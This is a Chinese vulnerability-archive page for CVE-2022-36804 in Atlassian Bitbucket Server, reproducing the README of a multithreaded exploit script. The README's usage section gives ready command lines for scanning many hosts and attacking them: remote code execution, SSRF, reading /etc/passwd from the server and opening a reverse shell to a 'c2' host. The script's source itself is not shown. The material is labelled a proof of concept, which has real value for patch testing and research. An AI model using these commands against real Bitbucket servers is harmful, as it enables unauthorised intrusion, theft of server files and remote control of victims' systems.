关联漏洞
标题:
Atlassian Bitbucket Server 安全漏洞
(CVE-2022-36804)
描述:Atlassian Bitbucket Server是澳大利亚Atlassian公司的一款Git代码托管解决方案。该方案能够管理并审查代码,具有差异视图、JIRA集成和构建集成等功能。 Atlassian Bitbucket Server and Data Center存在安全漏洞,该漏洞源于允许对公共或私有Bitbucket库有读取权限的远程攻击者通过发送恶意的HTTP请求执行任意代码。以下产品及版本受到影响:7.0.0 至 7.6.17 之前版本,7.7.0 至 7.17.10 之前版本,7.18.0
描述
Multithreaded exploit script for CVE-2022-36804 affecting BitBucket versions <8.3.1
介绍
# CVE-2022-36804-PoC
Multithreaded exploit script for CVE-2022-36804 affecting (most) BitBucket versions <8.3.1
See the full advisory here https://jira.atlassian.com/browse/BSERV-13438
All credit to [TheGrandPew](https://twitter.com/TheGrandPew) for discovery
The script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances.
The PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.
Do not use for malicious purposes.
## Usage
```bash
usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
[--skip-check] [-t THREADS] [-v]
repos [repos ...]
CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1
optional arguments:
-h, --help show this help message and exit
required arguments:
repos Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on
optional arguments:
--auth-cookie AUTH_COOKIE
Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
--proxy PROXY HTTP Proxy: <http/https>://<ip>:<port>
-e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
Exploit to perform
--cmd CMD Command to execute for the 'rce' exploit (curl http://example.com)
--knary KNARY Knary to respond too via DNS for the 'ssrf' exploit
--server-file SERVER_FILE
Server file to download for the 'download' exploit (/etc/passwd)
--host HOST Hostname or IP address of c2 for the 'rev_shell' exploit
--port PORT Port of the c2 for the 'rev_shell' exploit
--skip-check Skip vulnerability checking stage
-t THREADS, --threads THREADS
Worker Threads
-v, --verbose Increase output verbosity level
```
### Exploit modes
#### Check
> Single Host
>
> `CVE-2022-36804.py http://bitbucket.local:7990/`
>
> Multiple Hosts and piping vulnerable hosts and repositories exploited to file
>
> `CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts`
#### RCE (Remote Code Execution)
> `CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/`
#### SSRF (Server-Side Request Forgery)
> Perform a DNS request to the specified knary
>
> `CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/`
#### Download
> Download a repository with the target file `/etc/passwd`, this will save the compressed repository to a randomised file name.
>
> `CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/`
#### Rev_shell (Generates a reverse sh shell to the specified host and port)
> `CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/`
文件快照
[4.0K] /data/pocs/372c50272100a17156bea22b73d2c0c4a14a5c1c
├── [ 14K] CVE-2022-36804.py
├── [3.3K] README.md
└── [ 44] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。